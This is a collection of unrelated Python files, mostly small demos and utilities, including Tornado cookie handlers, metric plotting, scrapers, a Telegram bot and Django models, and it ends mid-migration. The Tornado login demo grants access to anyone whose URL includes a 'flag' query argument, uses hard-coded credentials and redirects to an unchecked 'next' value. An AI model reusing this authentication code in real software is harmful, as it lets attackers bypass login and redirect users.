class StaticFileHandler(tornado.web.StaticFileHandler):
    """Static file handler that also issues an XSRF cookie on every request."""
    def __init__(self, *args, **kwargs):
        super(StaticFileHandler, self).__init__(*args, **kwargs)
        # Accessing the property forces Tornado to set the _xsrf cookie.
        self.xsrf_token
# Plain-cookie demos
class PCookieHandler(RequestHandler):
    """Demo: set a plain (unsigned) cookie."""
    def get(self, *args, **kwargs):
        # Set the cookie "sunck" -> "good".
        self.set_cookie("sunck","good")
        # self.set_header("Set-Cookie","kaige=nice; Path=/")
        self.write("ok")
class GetPCookieHandler(RequestHandler):
    """Demo: read the plain cookie, with a default for first-time visitors."""
    def get(self, *args, **kwargs):
        # Read the cookie; the default string means "not logged in".
        cookie = self.get_cookie("sunck", "未登录")
        print("cookie =", cookie)
        self.write("ok")
class ClearPCookieHandler(RequestHandler):
    """Demo: clear cookies for this request."""
    def get(self, *args, **kwargs):
        # Clear a single cookie:
        # self.clear_cookie("sunck")
        # Clear all cookies:
        self.clear_all_cookies()
        self.write("ok")
# Secure (signed) cookies
class SCookieHandler(RequestHandler):
    """Demo: set a signed cookie (requires cookie_secret in the app settings)."""
    def get(self, *args, **kwargs):
        self.set_secure_cookie("zhangmanyu","nice")
        self.write("ok")
class GetSCookieHandler(RequestHandler):
    """Demo: read back the signed cookie (None when missing or tampered)."""
    def get(self, *args, **kwargs):
        scookie = self.get_secure_cookie("zhangmanyu")
        print("scookie =", scookie)
        self.write("ok")
# Cookie-based visit counter
class CookieNumHandler(RequestHandler):
    """Render the counter page with the current 'count' cookie value."""
    def get(self, *args, **kwargs):
        # Default string means "not logged in" (no counter yet).
        count = self.get_cookie("count","未登录")
        self.render('cookienum.html', count = count)
class PostFileHandler(RequestHandler):
    """Serve the upload form; each POST bumps the 'count' cookie."""
    def get(self, *args, **kwargs):
        self.render('postfile.html')
    def post(self, *args, **kwargs):
        # Initialize the counter on first visit, otherwise increment it.
        count = self.get_cookie("count", None)
        if not count:
            count = 1
        else:
            count = int(count)
            count += 1
        self.set_cookie("count", str(count))
        self.redirect("/cookienum")
class SetXSRFCookie(RequestHandler):
    """Demo: force Tornado to issue the _xsrf cookie."""
    def get(self, *args, **kwargs):
        # Touching the property sets the _xsrf cookie on the response.
        self.xsrf_token
        self.finish("Ok")
# User authentication
class LoginHandler(RequestHandler):
    """Login form; on success redirects back to the originally requested page."""
    def get(self, *args, **kwargs):
        # Preserve the page the user originally asked for.
        next = self.get_argument("next", "/")
        url = "login?next=" + next
        self.render("login.html", url = url)
    def post(self, *args, **kwargs):
        name = self.get_argument("username")
        pawd = self.get_argument("passwd")
        # NOTE(review): hard-coded demo credentials ("1"/"1").
        if name == "1" and pawd == "1":
            next = self.get_argument("next", "/")
            # The flag query arg is what get_current_user() checks downstream.
            self.redirect(next+"?flag=logined")
        else:
            next = self.get_argument("next", "/")
            print("next = ", next)
            self.redirect("/login?next="+next)
class HomeHandler(RequestHandler):
    """Page guarded by @authenticated; the 'flag' query arg marks login state."""
    def get_current_user(self):
        # /home
        flag = self.get_argument("flag", None)
        return flag
    @tornado.web.authenticated
    def get(self, *args, **kwargs):
        self.render("home.html")
class CartHandler(RequestHandler):
    """Cart page with the same query-arg based authentication as /home."""
    def get_current_user(self):
        # /home
        flag = self.get_argument("flag", None)
        return flag
    @tornado.web.authenticated
    def get(self, *args, **kwargs):
        self.render("cart.html")
|
import numpy as np
from matplotlib import pyplot as plt
import pandas as pd
from ggplot import *
from sklearn.metrics import *
class Eval():
    """Evaluation helper for a binary classifier.

    Maps yes/true-style labels to 1/0, tallies confusion counts, and draws
    confusion-matrix / DET / ROC / precision-recall plots.
    NOTE(review): plotting methods rely on the unmaintained `ggplot` package
    and on sklearn.metrics names imported via `*`.
    """
    def __init__(self, y, pred, labels):
        self.y = y            # ground-truth labels (various truthy spellings)
        self.y01 = []         # y mapped to 0/1 (filled by computeErrors)
        self.pred = pred      # predicted labels
        self.pred01 = []      # predictions mapped to 0/1 (filled by computeErrors)
        self.labels = labels  # display names for the confusion matrix
        self.fp = 0.
        self.tp = 0.
        self.p = 0.           # total positives = tp + fn
        self.fn = 0.
        self.tn = 0.
        self.n = 0.           # total negatives = fp + tn
        self.cm = []          # confusion matrix (set by confusionMatrix)
        self.auc = []
    def computeErrors(self):
        """Populate y01/pred01 and the tp/fp/tn/fn tallies."""
        print("Compute False/True Positive/Negative")
        for i in range(len(self.y)):
            yi = self.y[i]
            yhi = self.pred[i]
            # Any yes/true spelling, True, or 1 counts as the positive class.
            if yi == 'Yes' or yi == 'yes' or yi == 'true' or yi == 'True' \
                    or yi == True or yi == 1:
                self.y01.append(1)
                # pred01 is inferred from whether prediction agrees with truth.
                if yi == yhi:
                    self.tp += 1
                    self.pred01.append(1)
                else:
                    self.fn += 1
                    self.pred01.append(0)
            else:
                self.y01.append(0)
                if yi == yhi:
                    self.tn += 1
                    self.pred01.append(0)
                else:
                    self.fp += 1
                    self.pred01.append(1)
        self.p = self.tp + self.fn
        self.n = self.fp + self.tn
    def plot_confusion_matrix(self):
        """Draw self.cm on the current matplotlib figure with count labels."""
        plt.imshow(self.cm, interpolation='nearest')
        plt.title('Confusion matrix')
        plt.colorbar()
        tick_marks = np.arange(len(self.labels))
        plt.xticks(tick_marks, self.labels, rotation=45)
        plt.yticks(tick_marks, self.labels)
        plt.tight_layout()
        plt.ylabel('True label')
        plt.xlabel('Predicted label')
        # Write the raw count into every cell.
        for x in range(len(self.cm)):
            for y in range(len(self.cm[x])):
                plt.annotate(str(self.cm[x][y]), xy=(y, x))
    def confusionMatrix(self):
        """Compute the confusion matrix and save it to confusion_matrix.png."""
        self.cm = confusion_matrix(self.y, self.pred)
        plt.figure()
        self.plot_confusion_matrix()
        plt.savefig('confusion_matrix.png')
    def DET_curve(self):
        """Plot a DET curve (false positives vs missed detections).

        NOTE(review): fpr/tpr are rescaled in place to absolute counts
        before plotting — confirm that is intended.
        """
        fpr, tpr, _ = roc_curve(self.y01, self.pred01)
        fnr = []
        for i in range(len(tpr)):
            fpr[i] *= self.n
            tpr[i] *= self.p
            fnr.append(self.p - tpr[i])
        print(fpr)
        print(fnr)
        df = pd.DataFrame(fpr, fnr)
        det = ggplot(df, aes(x=fpr, y=fnr), log='y') \
            + geom_line() \
            + xlab("False Positive Rate") + ylab("False Negative Rate") \
            + scale_x_log10() + scale_y_log10() \
            + ggtitle("Detection Error Tradeoff (DET) curve")
        ggsave(det, 'DET')
    def ROC_curve(self):
        """Plot the ROC curve; print AUC and the Gini coefficient."""
        fpr, tpr, _ = roc_curve(self.y01, self.pred01)
        auc_roc = auc(fpr, tpr)
        df = pd.DataFrame(fpr, tpr)
        pauc = ggplot(df, aes(x='fpr', ymin=0, ymax='tpr')) \
            + geom_area(alpha=0.2) \
            + xlab("True Positive Rate") + ylab("False Positive Rate") \
            + geom_line(aes(y='tpr')) \
            + ggtitle("ROC Curve | AUC = %s" % str(auc_roc))
        ggsave(pauc, 'ROC')
        print("AUC:\t\t\t", auc_roc)
        print("GINI COEFFICIENT:\t", 2 * auc_roc - 1)
    def precision_recall_curve(self):
        """Plot the precision-recall curve with the average precision.

        The bare call below resolves to sklearn's precision_recall_curve
        (imported via *), not to this method — no recursion.
        """
        precision, recall, _ = precision_recall_curve(self.y01, self.pred01)
        avg = average_precision_score(self.y01, self.pred01)
        df = pd.DataFrame(precision, recall)
        pr = ggplot(df, aes(x=precision, y=recall)) \
            + geom_line() \
            + xlab("Precision") + ylab("Recall") \
            + ggtitle("Precision-Recall curve | AVG = %s" % str(avg))
        ggsave(pr, 'Precision-Recall')
    def fmeasure(self, beta):
        """Print the F-beta measure from the current recall and precision."""
        beta = float(beta)
        recall = self.recall()
        precision = self.precision()
        print(recall)
        print(precision)
        fm = ((1 + beta * beta) * recall * precision) \
            / (beta * beta * recall + precision)
        print("F MEASURE:\t\t", fm)
    def accuracy(self):
        # Good classification rate
        return (self.tp + self.tn) / (self.p + self.n)
    def recall(self):
        # Recall, true positive rate, sensitivity
        return self.tp / self.p
    def recallRate(self, tp, p):
        # Recall, true positive rate, sensitivity
        return tp / p
    def falseAlarm(self):
        # False alarm rate, false positive rate
        return self.fp / self.n
    def falseAlarmRate(self, fp, n):
        # False alarm rate, false positive rate
        return fp / n
    def miss(self):
        # Missed detection rate, false negative rate
        return self.fn / self.p
    def specificity(self):
        # Specificity, true negative rate
        return 1 - self.falseAlarm()
    def precision(self):
        # Precision
        return self.tp / (self.tp + self.fp)
    def fscore(self):
        # F-score
        # NOTE(review): this is precision * recall, not the harmonic mean
        # usually called F1 — confirm intended.
        return self.precision() * self.recall()
|
#!/usr/bin/env python3
from PIL.ExifTags import TAGS
from PIL import Image
import sys
# Image to inspect: first CLI argument, with a baked-in default.
# Bug fix: the original line `img = #"1609060501529.png"` commented out the
# value, leaving a bare assignment — a SyntaxError.
img = sys.argv[1] if len(sys.argv) > 1 else "1609060501529.png"
try:
    exifData = {}
    file = Image.open(img)
    info = file._getexif()
    print(info)
    if info:
        for (tag, value) in info.items():
            # Map numeric EXIF tag ids to their readable names.
            decoded = TAGS.get(tag, tag)
            exifData[decoded] = value
        # .get avoids a KeyError when the image carries no GPS block.
        gps = exifData.get('GPSInfo')
        if gps:
            # Bug fix: GPSInfo is a dict; stringify before concatenation
            # (the original `+ gps` raised TypeError).
            print("[X] " + img + " Datos GPS : " + str(gps))
except Exception:
    # Best-effort: unreadable files / formats without EXIF are skipped.
    pass
|
import pytest
def test_idk():
    # Intentionally failing placeholder test.
    assert False
def test_also_a_test():
    # Integer floor division: 2 // 2 is 1, so this assertion passes.
    assert 2 // 2 == 1
# classes with constructors cant be used as test containers
class TestWithConstructor(object):
    """Pytest skips this class: defining __init__ disables collection."""
    def __init__(self):
        pass
    def test_wont_work(self):
        # Never runs under pytest because the class is not collected.
        assert False
class TestClassExample(object):
    """Collectable pytest container (no __init__ defined)."""
    dog = 'dog'
    # ['g', 'o', 'd'] reversed and joined -> 'dog'
    backwardsdog = ''.join(['g', 'o', 'd'][::-1])

    def is_it_dog(self, animal):
        """Return True when *animal* equals the class's dog constant."""
        return self.dog == animal

    def test_dog(self):
        assert self.is_it_dog(self.backwardsdog)
def test_with_parameters(param_example):
    # 'param_example' must be supplied by a pytest fixture of the same name.
    assert type(param_example) == int
|
# The water-tank example coded in Python
# TODO: Still need to write the parser
import macropy.activate
from language import *
from gen import *
from sympy import *
import shac
# This is the Raskin model of the thermostat example
# K = 0.075 heating rate in t4, h = 150.
# ODEs: cooling dynamics (dx/dt = 10 - x) and heating dynamics
# (dx/dt = 37.78 - x), both starting from x = 22.78.
ode1 = Ode(sympify("diff(x(t))+x(t)-10"), S("x(t)"), 22.78, {})
ode2 = Ode(sympify("diff(x(t))+x(t)-37.78"), S("x(t)"), 22.78, {})

# The locations of the hybrid automaton
# t1 cools while x > 22.78; t2 heats while x < 25.
t1 = Loc("t1", [ode1], [],
         {S("x(t)"): [Guard(S("x>22.78"))]})
t2 = Loc("t2", [ode2], [],
         {S("x(t)"): [Guard(S("x<25"))]})

# The edges
# t1 -> t2 when x drops to 22.78; x is carried over unchanged.
e1 = Edge('t1', 't2', {S("x(t)"): [Guard(S("x<=22.78")),
                                   ]},
          [Update.Update2(Symbol('x'), Symbol('x'))],
          [])
# t2 -> t1 when x reaches 25.
e2 = Edge('t2', 't1', {S("x(t)"): [Guard(S("x>=25"))]},
          [Update.Update2(Symbol('x'), Symbol('x'))],
          [])

# The automaton starts in the heating location t2.
thermostat = Ha("thermostat", [t1, t2], t2,
                [e1, e2], [], [])

# Compile
shac.compile(thermostat)
|
import pymysql
# Connect to the local MySQL server (host, user, password — positional args).
db=pymysql.connect('localhost','root','123456')
cur=db.cursor()
# NOTE(review): both CREATE statements fail on a second run because the
# database/table already exist — consider IF NOT EXISTS.
cur.execute("create database python;")
cur.execute("use python")
cur.execute("create table t1(id int,name char(20),age tinyint unsigned,sex enum('boy','girl'));")
cur.execute("insert into t1 values(1,'zhangsanfeng',30,'boy'),(2,'wuji.zhang',25,'boy'),(3,'panjielian',25,'girl'),(4,'ximenqing',40,'boy'),(5,'wudalang',33,'boy');")
cur.execute('select*from t1;')
# fetchone returns only the first row of the result set.
data=cur.fetchone()
print('fetchone的结果是',data)
# Commit the inserts, then release the cursor and connection.
db.commit()
cur.close()
db.close()
|
# Import socket module
import socket
def Main():
    """Interactive TCP chat client: send lines, print replies, 'n' quits."""
    server_host = socket.gethostname()  # connect to this machine
    server_port = 12345                 # must match the server's port
    sock = socket.socket()
    sock.connect((server_host, server_port))
    while True:
        # Read one line from the user and ship it to the server.
        outgoing = input('-> ')
        sock.send(outgoing.encode())
        # Print whatever the server answers (up to 1 KiB).
        reply = sock.recv(1024)
        print('Received from the server :', str(reply.decode()))
        # Anything other than 'y' ends the session.
        if input('\nDo you want to continue(y/n) :') != 'y':
            break
    sock.close()


if __name__ == '__main__':
    Main()
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from telegram.ext import Updater, MessageHandler, Filters
from telegram_util import splitCommand, log_on_fail, autoDestroy, formatChat, matchKey
from db import Source, Subscription
import loop
from common import tele, debug_group
from iterateMessage import iterateMessage
import traceback as tb
def commandImp(msg):
    """Dispatch one s4_* bot command contained in *msg*.

    Commands: s4_g (generate), s4_source_add/s4_sa/s4_a,
    s4_source_delete/s4_sd/s4_d, s4_source_list/s4_sl/s4_l, s4_sub/s4_s.
    Replies are auto-destroyed to keep the chat clean.
    """
    autoDestroy(msg)
    command, text = splitCommand(msg.text)
    if "s4_g" in command:
        return msg.reply_text(iterateMessage(msg.chat.id), quote=False)
    elif matchKey(command, ["s4_source_add", "s4_sa", "s4_a"]):
        autoDestroy(msg.reply_text(Source.add(text)))
    elif matchKey(command, ["s4_source_delete", "s4_sd", "s4_d"]):
        autoDestroy(msg.reply_text(Source.remove(text)))
    elif matchKey(command, ["s4_source_list", "s4_sl", "s4_l"]):
        pass # intentional: listing happens in the shared block below
    elif matchKey(command, ["s4_sub", "s4_s"]):
        Subscription.add(msg.chat.id, text)
    else:
        return
    # Source-related commands answer with the full source list; everything
    # else just acks. NOTE(review): "s3_d" below looks like a typo for
    # "s4_d" — confirm before changing.
    if matchKey(command, ["s4_source", "s4_sl", "s4_l", "s4_sa", "s4_a", "s4_sd", "s3_d"]):
        sources = ['[%s](t.me/%s)' % (chatname, chatname) for \
            chatname in Source.db.keys()]
        autoDestroy(msg.reply_text('Source list: \n' + '\n'.join(sources),
            parse_mode='Markdown',
            disable_web_page_preview=True))
    else:
        autoDestroy(msg.reply_text("success"))
def command(update, context):
    """Telegram handler: run commandImp, echoing any error back to the chat."""
    msg = update.effective_message
    try:
        commandImp(msg)
    except Exception as e:
        # Surface the failure to the user, log the traceback, then re-raise.
        autoDestroy(msg.reply_text(str(e)))
        tb.print_exc()
        raise e
# Route every Telegram command message to `command`, then start long polling
# and block until interrupted.
tele.dispatcher.add_handler(MessageHandler(Filters.command, command))
tele.start_polling()
tele.idle()
from django.contrib import admin
from .models import Report, DLL, UsesDLL
class ReportAdmin(admin.ModelAdmin):
    """Admin list view for reports, searchable by link and md5."""
    list_display = ('link', 'md5', 'file_type', 'date')
    search_fields = ['link', 'md5']
class DLLAdmin(admin.ModelAdmin):
    """Admin list view for DLLs, showing only the name."""
    list_display = ('name',)
class UsesDLLAdmin(admin.ModelAdmin):
    """Admin list view for the report<->DLL association rows."""
    list_display = ('report', 'dll')
# Register each model with its customised admin class.
for _model, _model_admin in ((Report, ReportAdmin), (DLL, DLLAdmin),
                             (UsesDLL, UsesDLLAdmin)):
    admin.site.register(_model, _model_admin)
|
from bs4 import BeautifulSoup
import requests
import random
import re
def Status():
    """Scrape limitlessmc.net and return the text of its #serverstatus element."""
    r = requests.get("http://limitlessmc.net/")
    soup = BeautifulSoup(r.text, "html.parser")
    val = soup.select("#serverstatus")
    return val[0].text
def wotd():
    """Scrape Merriam-Webster's word-of-the-day page.

    Returns:
        dict with key 'Day' holding the page's date text.

    NOTE(review): selecting div index 44 / span index 0 is layout-dependent
    and breaks whenever the page markup changes.
    """
    packet = {}
    r = requests.get("https://www.merriam-webster.com/word-of-the-day")
    soup = BeautifulSoup(r.text, "html.parser")
    val = soup.select("div")
    soup = BeautifulSoup(str(val[44]), "html.parser")
    val = soup.select("span")
    packet['Day'] = val[0].text[11:]
    # Bug fix: the dict was built and then silently discarded — return it.
    return packet
def ForumPost(url : str, num = 0):
    """Fetch a forum thread and format post *num* for Discord.

    Combines the author/date sidebar with the cleaned post body; output over
    1500 chars is truncated to ~1450 with a link back to the thread.
    NOTE(review): the Side[2]/Side[3] indices are layout-dependent.
    """
    r = requests.get(url)
    soup = BeautifulSoup(r.text, "html.parser")
    Side = soup.select("div.pull-left")
    val = soup.select("div.content")
    #mainclean = val[0].text
    # Split the post HTML on <br/> and strip the wrapper div tags.
    text = str(val[num]).split('<br/>')
    text[num] = text[num].replace('<div class="content">', '')
    text[len(text)-1] = text[len(text)-1].replace('</div>', '')
    nText = []
    for l in text:
        nText.append(cleanLine(l))
    mainclean = '\n'.join(nText)
    clean = "**" + Side[2].text.replace("\n", '') + "**" + Side[3].text.replace('\t', '') + "------------------------------------" + "\n" + mainclean
    if(len(clean) > 1500):
        clean = clean[:1450] + "...\n------------------------------------\n*If you would like to read more, click the link below!*\n{}".format(url)
    #print(clean)
    return clean
def fmlText():
    """Fetch one random FML story; retries once if the first page had none."""
    r = requests.get("http://www.fmylife.com/random")
    soup = BeautifulSoup(r.text, "html.parser")
    val = soup.select("p.content")
    if(len(val) < 1):
        # Single retry; a second empty page would raise IndexError below.
        print("ERROR in FML cmd")
        r = requests.get("http://www.fmylife.com/random")
        soup = BeautifulSoup(r.text, "html.parser")
        val = soup.select("p.content")
    return val[0].text
def cleanLine(line):
    """Convert one line of forum-post HTML into Discord-flavoured markdown.

    Bold spans become **...**, two known smiley <img> tags become text
    emoticons, and bare postlink anchor tags are stripped.
    """
    print('cleaning')
    if('<span style="font-weight: bold">' in line):
        line = line.replace('<span style="font-weight: bold">', '**')
        line = line.replace('</span>', '**')
        # Bug fix: the original called line.replace("\n", '') but dropped
        # the result, so the newline removal never took effect.
        line = line.replace("\n", '')
    line = line.replace('<img alt=";)" src="./images/smilies/icon_e_wink.gif" title="Wink"/>', ';)')
    line = line.replace('<img alt=":(" src="./images/smilies/icon_e_sad.gif" title="Sad"/>', ':(')
    if('<a class="postlink" href="' in line):
        line = line.replace('<a class="postlink" href="', '')
        line = line.replace('</a>', '')
    return line
def youtube(input1:str, num = 0):
    """Return the URL of the num-th YouTube search result for *input1*.

    Recurses to the next result when no video id is found in the current one.
    NOTE(review): unbounded recursion if no result ever matches.
    """
    r = requests.get("https://www.youtube.com/results?search_query="+input1)
    soup = BeautifulSoup(r.text, "html.parser")
    val = soup.select("h3")
    # Result links start at h3 index 4 on the classic results page.
    m = re.search('href="/watch\?v=(.{11})"', str(val[4 + num]))
    #print(str(val[4 + num]), '\n')
    #print(m.group(0)[15:-1])
    if(m == None):
        return youtube(input1, num+1)
    # Slice the 11-character video id out of the matched href.
    return 'https://www.youtube.com/watch?v=' + m.group(0)[15:-1]
def nextSong(url, num = 0):
    """Return the URL of a related/next video linked from *url*.

    Scans anchor tags from index 20 onward, recursing forward until a
    /watch?v= link appears. NOTE(review): unbounded recursion if none match.
    """
    r = requests.get(url)
    soup = BeautifulSoup(r.text, "html.parser")
    val = soup.select("a")
    m = re.search('href="/watch\?v=(.{11})"', str(val[20 + num]))
    if(m == None):
        return nextSong(url, num+1)
    return 'https://www.youtube.com/watch?v=' + m.group(0)[15:-1]
def wouldYouRather():
    """Scrape either.io and return [(option1, votes1), (option2, votes2)].

    NOTE(review): the span indices 6/11/7/15 are layout-dependent.
    """
    r = requests.get("http://either.io/")
    soup = BeautifulSoup(r.text, "html.parser")
    val = soup.select("span")
    return [(val[6].text, val[11].text) , (val[7].text, val[15].text)]
# r = requests.get("https://www.merriam-webster.com/word-of-the-day")
# soup = BeautifulSoup(r.text, "html.parser")
# val = soup.select("div")
# #print(val[44])
# soup = BeautifulSoup(str(val[44]), "html.parser")
# val = soup.select("span")
# # #print(val[20])
# # m = re.search('href="/watch\?v=(.{11})"', str(val[20]))
# # print('https://www.youtube.com/watch?v=' + m.group(0)[15:-1])
# # count = 0
# # for v in val:
# # if count < 20:
# # try:
# # print(str(count), v.text)
# # except Exception as e:
# # print(e, "Error")
# # count += 1
# print(val[0].text[11:])
# packet = {}
# r = requests.get("https://www.merriam-webster.com/word-of-the-day")
# soup = BeautifulSoup(r.text, "html.parser")
# val = soup.select("div")
# soup2 = BeautifulSoup(str(val[44]), "html.parser")
# val2 = soup2.select("span")
# packet['Day'] = val2[0].text[11:-8]
# val3 = soup2.select("div")
# packet['Word'] = val3[4].text[1:-7]
# val4 = soup.select("p")
# packet['Defintion = ']
# count = 0
# for v in val4:
# if count < 20:
# try:
# print(str(count), v.text)
# except Exception as e:
# print(e, "Error")
# count += 1
# r = requests.get("http://either.io/")
# soup = BeautifulSoup(r.text, "html.parser")
# val = soup.select("span")
# count = 0
# for v in val:
# if count < 20:
# try:
# print(str(count), v.text)
# except Exception as e:
# print(e, "Error")
# count += 1
# print(val[6].text, val[11].text)
# print(val[7].text, val[15].text)
# for x in val3:
# print(x.text)
#print(val3)
#print(packet)
# print(val.text)
# while val[num].text == "Cacophony":
# num =+ 1
# try:
# print(val[num].text)
# except Exception:
# print("ERROR")
# f = open(val[23].text.strip(), 'r')
# print(f.read())
########### Getting Pictures #########################
# r = requests.get("http://pokemondb.net/pokedex/national")
# soup = BeautifulSoup(r.text, "html.parser")
# val = soup.select(".infocard-tall")
# name = "Venusaur"
# #print(val[ID(name) - 1]['class'])
# val2 = val[ID(name) - 1].select("a")
# count = 0
# print(val2[0]["data-sprite"]) |
import sys
import os
import subprocess
sys.path.insert(0, 'scripts')
sys.path.insert(0, 'scripts/generax')
import experiments as exp
import launch_alegenerax
import fam
def run(datadir, gene_trees, subst_model, transfer_constraint, cores, additional_arguments):
    """Set up a results directory and launch an AleGeneRax run.

    Side effect: appends the transfer-constraint flag and value to the
    *additional_arguments* list passed in by the caller.
    """
    # Removed the unused local `strategy = "SPR"` from the original.
    species_tree = "true"  # always evaluate against the true species tree
    base = "alegenerax_" + transfer_constraint.lower() + "_" + gene_trees + "_run"
    resultsdir = fam.get_run_dir(datadir, subst_model, base)
    # Forward the transfer constraint to the underlying launcher.
    additional_arguments.append("--transfer-constraint")
    additional_arguments.append(transfer_constraint)
    exp.reset_dir(resultsdir)
    launch_alegenerax.run(datadir, subst_model, species_tree, gene_trees, cores, additional_arguments, resultsdir)
|
from django.contrib.auth import get_user_model
from django.db import models
# Create your models here.
from django.db.models import CheckConstraint
User = get_user_model()
class Category(models.Model):
    """Product category; the slug doubles as the primary key."""
    title = models.CharField(max_length=50, unique=True)
    slug = models.SlugField(max_length=50, primary_key=True)
    image = models.ImageField(upload_to='categories', null=True, blank=True)

    def __str__(self):
        return self.title
class Product(models.Model):
    """A device-style product (storage/memory/color), listed newest first."""
    title = models.CharField(max_length=50, unique=True)
    slug = models.SlugField(max_length=50, primary_key=True)
    description = models.TextField()
    category = models.ForeignKey(Category, on_delete=models.CASCADE, related_name='products')
    image = models.ImageField(upload_to='products')
    storage = models.PositiveSmallIntegerField()  # presumably GB — TODO confirm units
    memory = models.PositiveSmallIntegerField()   # presumably GB — TODO confirm units
    color = models.CharField(max_length=100)
    price = models.PositiveIntegerField()
    created_at = models.DateField(auto_now_add=True)

    class Meta:
        # Newest products first.
        ordering = ['-created_at']

    def __str__(self):
        return self.title
class Comment(models.Model):
    """User review of a product with a DB-enforced 1..10 rating."""
    text = models.TextField()
    product = models.ForeignKey(Product, on_delete=models.CASCADE, related_name='comments')
    user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='comments')
    rating = models.PositiveBigIntegerField(default=1)
    created_at = models.DateTimeField(auto_now_add=True)

    class Meta:
        ordering = ['created_at']
        constraints = [
            # Keep ratings within the inclusive 1..10 range at the DB level.
            CheckConstraint(
                check=models.Q(rating__gte=1) & models.Q(rating__lte=10),
                name='rating_range'
            )
        ]
class Like(models.Model):
    """Per-user like flag on a product."""
    product = models.ForeignKey(Product, on_delete=models.CASCADE, related_name='likes')
    user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='likes')
    is_liked = models.BooleanField(default=False)
|
from numba import jit
import numpy as np
'''
this module implements functions for measuring feature vector similarity
between graph verticies. loop-based functions are just-in-time compiled with
numba, which results in fast code with limited memory overhead.
Note: all distances are stored at 64-bit floating point numbers
'''
@jit(nopython=True)
def pairwise_cos_distance(feature_vectors):
    '''
    pairwise cosine similarity function for verticies

    Args:
        feature_vectors (ndarray) M (num samples) x N (num features)
    Returns (ndarray) M x M array of cosine similarities
    '''
    M = feature_vectors.shape[0]
    N = feature_vectors.shape[1]
    D = np.empty((M, M), dtype=np.float64)
    for i in range(M):
        for j in range(M):
            dot = 0.0
            inorm = 0.0  # squared norm of row i
            jnorm = 0.0  # squared norm of row j
            for k in range(N):
                dot += feature_vectors[i, k] * feature_vectors[j, k]
                inorm += feature_vectors[i, k] * feature_vectors[i, k]
                jnorm += feature_vectors[j, k] * feature_vectors[j, k]
            # Bug fix: the original divided by the squared norms
            # (dot / idot / jdot); cosine similarity normalises by the
            # product of the vector lengths.
            D[i, j] = dot / np.sqrt(inorm * jnorm)
    return D
@jit(nopython=True)
def sub_pairwise_cos_distance(feature_vectors, sub_vectors):
    '''
    pairwise cosine similarity for a subset of verticies

    Args:
        feature_vectors (ndarray) M (samples) x N (features)
        sub_vectors (ndarray) m (samples) x N (features), where m <= M
    Returns (ndarray) M x m array of cosine similarities
    '''
    M = feature_vectors.shape[0]
    N = feature_vectors.shape[1]
    m = sub_vectors.shape[0]
    D = np.empty((M, m), dtype=np.float64)
    for i in range(M):
        for j in range(m):
            dot = 0.0
            inorm = 0.0  # squared norm of feature_vectors row i
            jnorm = 0.0  # squared norm of sub_vectors row j
            for k in range(N):
                dot += feature_vectors[i, k] * sub_vectors[j, k]
                # Bug fix: the original mixed rows from the two matrices
                # when accumulating the norms (feature_vectors[i]*sub_vectors[i]
                # and feature_vectors[j]*sub_vectors[j]); each norm must come
                # from a single row of a single matrix.
                inorm += feature_vectors[i, k] * feature_vectors[i, k]
                jnorm += sub_vectors[j, k] * sub_vectors[j, k]
            # Bug fix: normalise by the product of lengths, not by each
            # squared norm in turn.
            D[i, j] = dot / np.sqrt(inorm * jnorm)
    return D
@jit(nopython=True)
def pairwise_squared_distance(feature_vectors):
    '''
    pairwise Euclidean distance function for vertices

    Args:
        feature_vectors (ndarray) M (num samples) x N (num features)
    Returns (ndarray) M x M array of float64 distances
    '''
    M = feature_vectors.shape[0]
    N = feature_vectors.shape[1]
    D = np.empty((M, M), dtype=np.float64)
    for i in range(M):
        for j in range(M):
            d = 0.0
            for k in range(N):
                tmp = feature_vectors[i, k] - feature_vectors[j, k]
                # Fix: the original accumulated the raw (signed) differences,
                # so d could be negative and np.sqrt(d) returned NaN. The
                # squared difference is what the sqrt below expects.
                d += tmp * tmp
            D[i, j] = np.sqrt(d)
    return D
@jit(nopython=True)
def sub_pairwise_squared_distance(feature_vectors, sub_vectors):
    '''
    pairwise Euclidean distance function for a subset of vertices

    Args:
        feature_vectors (ndarray) M (samples) x N (features)
        sub_vectors (ndarray) m (samples) x N (features), where m <= M
    Returns (ndarray) M x m array of float64 distances
    '''
    M = feature_vectors.shape[0]
    N = feature_vectors.shape[1]
    m = sub_vectors.shape[0]
    D = np.empty((M, m), dtype=np.float64)
    for i in range(M):
        for j in range(m):
            d = 0.0
            for k in range(N):
                tmp = feature_vectors[i, k] - sub_vectors[j, k]
                # Fix: square the difference; summing signed differences made
                # np.sqrt(d) NaN for negative sums (see pairwise_squared_distance).
                d += tmp * tmp
            D[i, j] = np.sqrt(d)
    return D
|
from .unet import UNet, UNetWithClassificationHead
from .fpn import FPN
|
from django.apps import AppConfig
class CaninoConfig(AppConfig):
    """Django application configuration for the `canino` app."""

    name = 'canino'
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from pants.backend.java.lint.google_java_format import rules as fmt_rules
from pants.backend.java.lint.google_java_format import skip_field
from pants.jvm import jdk_rules, util_rules
from pants.jvm.goals import lockfile
from pants.jvm.resolve import coursier_fetch, jvm_tool
def rules():
    """Collect every rule set needed to run google-java-format under Pants."""
    rule_sources = (
        fmt_rules.rules(),
        skip_field.rules(),
        jdk_rules.rules(),
        lockfile.rules(),
        jvm_tool.rules(),
        coursier_fetch.rules(),
        util_rules.rules(),
    )
    # Flatten the per-module iterables into a single list, preserving order.
    return [rule for source in rule_sources for rule in source]
|
from setuptools import setup
# Packaging metadata for the Kazikame game.
package_metadata = dict(
    name='kazikame',
    version='0.1',
    description='You have got bombs, So plant them and destroy!! ',
    url='https://github.com/theBansal/project-delta',
    author='Ironhulk',
    author_email='ironhulk4@gmail.com',
    license='NIT',
    packages=['Kazikame'],
    zip_safe=False,
)
setup(**package_metadata)
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2019-05-22 12:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: adjusts choice sets on classroom/levelfield.

    NOTE: generated by `makemigrations`; field definitions must stay in sync
    with Django's recorded migration state, so do not hand-edit the literals.
    """

    dependencies = [
        ('edu', '0010_auto_20190521_1138'),
    ]

    operations = [
        migrations.AlterField(
            model_name='classroom',
            name='branch',
            field=models.CharField(choices=[('a', 'الف'), ('b', 'ب'), ('c', 'ج')], default='a', max_length=2, null=True, verbose_name='گروه'),
        ),
        migrations.AlterField(
            model_name='levelfield',
            name='field',
